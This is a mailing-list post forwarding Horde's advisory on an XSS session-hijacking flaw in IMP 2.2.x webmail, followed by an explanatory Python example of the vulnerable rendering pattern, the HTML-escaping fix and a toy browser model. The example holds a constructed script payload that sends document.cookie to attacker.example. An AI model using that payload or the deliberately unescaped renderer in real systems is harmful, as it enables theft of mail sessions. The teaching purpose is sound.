I found the following message on Bugtraq. Is SuSE working on a fix for SuSE EMail-Server II? The patch on the update-server is still 2.2.6.

Martin

"Brent J. Nordquist" wrote:
The Horde team announces the availability of IMP 2.2.7, which fixes a potential session hijacking vulnerability using a cross-site scripting (CSS) attack. We recommend that all sites running IMP 2.2.x upgrade to this version.
The Horde Project would like to thank João Pedro Gonçalves from the Phibernet Information Network for discovering this problem and alerting us. From his description:
- It's possible to hijack an IMP/Horde session using a cross-site scripting attack, quite similar to the one explored by Marc Slemko in his "Microsoft Passport to Trouble" paper.
- After hijacking the cookies, the attacker can use the session and read the victim's mail.
- All stable IMP webmail versions, up to and including 2.2.6, are vulnerable; the devel version, 2.3, and 3.0 Release Candidate 1 are not affected by this vulnerability.
This release also has a new Chinese (Simplified) translation.
--
The three golden rules to ensure computer security are: Do not own a computer; do not power it on; and do not use it. (Robert (Bob) T. Morris)

GiS - Gesellschaft fuer integrierte Systemplanung mbH
Martin Sckopke
Junkersstr. 2, D-69469 Weinheim
Tel. +49-6201-503-74
Fax +49-6201-503-66
m.sckopke@gis-systemhaus.de
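The attack class the advisory describes (a script injected into a webmail page runs in the victim's browser and ships the session cookie to the attacker) is easier to reason about with a minimal model. The following is an added example written for this page; it is not Horde or IMP code and does not reproduce the actual IMP bug. The subject line, the session cookie value and the host name attacker.example are constructed for the illustration. It shows the vulnerable rendering pattern (header text interpolated straight into HTML), the output-encoding fix, and a toy browser model that reports whether the cookie would leave the origin.

```python
"""Added example (not Horde/IMP code): XSS-based session hijacking in a
webmail view and the output-encoding fix.

Everything here is constructed for illustration: the mail subject, the
session cookie value and the host attacker.example are not from the advisory.
"""
import html
import re
from typing import Optional

# Constructed sample: an incoming mail whose Subject header carries a
# cookie-stealing script. The target host is hypothetical.
MALICIOUS_SUBJECT = (
    "Meeting tomorrow <script>document.location="
    "'http://attacker.example/c?'+document.cookie</script>"
)

# Constructed session cookie; not a real Horde session identifier.
SESSION_COOKIE_NAME = "Horde"
SESSION_COOKIE_VALUE = "abc123sessionid"


def render_subject_vulnerable(subject: str) -> str:
    """Vulnerable pattern: untrusted header text dropped into HTML verbatim,
    so '<' and '>' from the attacker become real markup in the victim's page."""
    return "<td>%s</td>" % subject


def render_subject_fixed(subject: str) -> str:
    """Fixed pattern: encode HTML metacharacters so the browser treats the
    header as text. html.escape handles & < > " and '."""
    return "<td>%s</td>" % html.escape(subject, quote=True)


def contains_active_script(fragment: str) -> bool:
    """Check used by the toy browser and by a regression test: does the
    rendered fragment still contain a live <script> element?"""
    return re.search(r"<script\b", fragment, re.IGNORECASE) is not None


def session_cookie_header(value: str, http_only: bool) -> str:
    """Build a Set-Cookie header. HttpOnly is a defence-in-depth flag that
    keeps the cookie out of document.cookie; it is not part of the 2.2.7 fix
    and did not exist in browsers of that era, but a practitioner hardening
    a webmail deployment today would set it alongside output encoding."""
    header = "Set-Cookie: %s=%s; Path=/" % (SESSION_COOKIE_NAME, value)
    return header + "; HttpOnly" if http_only else header


def simulate_browser(fragment: str, cookie_header: str) -> Optional[str]:
    """Toy model of the victim's browser.

    If a <script> tag reached the page unencoded, the injected JavaScript
    runs with the webmail origin's privileges and reads document.cookie.
    Returns the cookie string the attacker would receive, or None when
    nothing leaks (no script executed, or cookie not script-readable)."""
    if not contains_active_script(fragment):
        return None
    # HttpOnly cookies are not exposed to document.cookie.
    if "; HttpOnly" in cookie_header:
        return None
    m = re.match(r"Set-Cookie: ([^;]+)", cookie_header)
    return m.group(1) if m else None


if __name__ == "__main__":
    cookie = session_cookie_header(SESSION_COOKIE_VALUE, http_only=False)
    for label, renderer in (("vulnerable", render_subject_vulnerable),
                            ("fixed", render_subject_fixed)):
        page = renderer(MALICIOUS_SUBJECT)
        print(label, "->", page)
        print("  cookie leaked:", simulate_browser(page, cookie))
```

Run stand-alone, the vulnerable renderer leaks `Horde=abc123sessionid`, the escaped renderer leaks nothing because the payload arrives as `&lt;script&gt;...` text. The toy browser is deliberately crude (it does not interpret JavaScript; it only decides whether a script element would execute), which is exactly the property a regression test for this bug class needs to assert on.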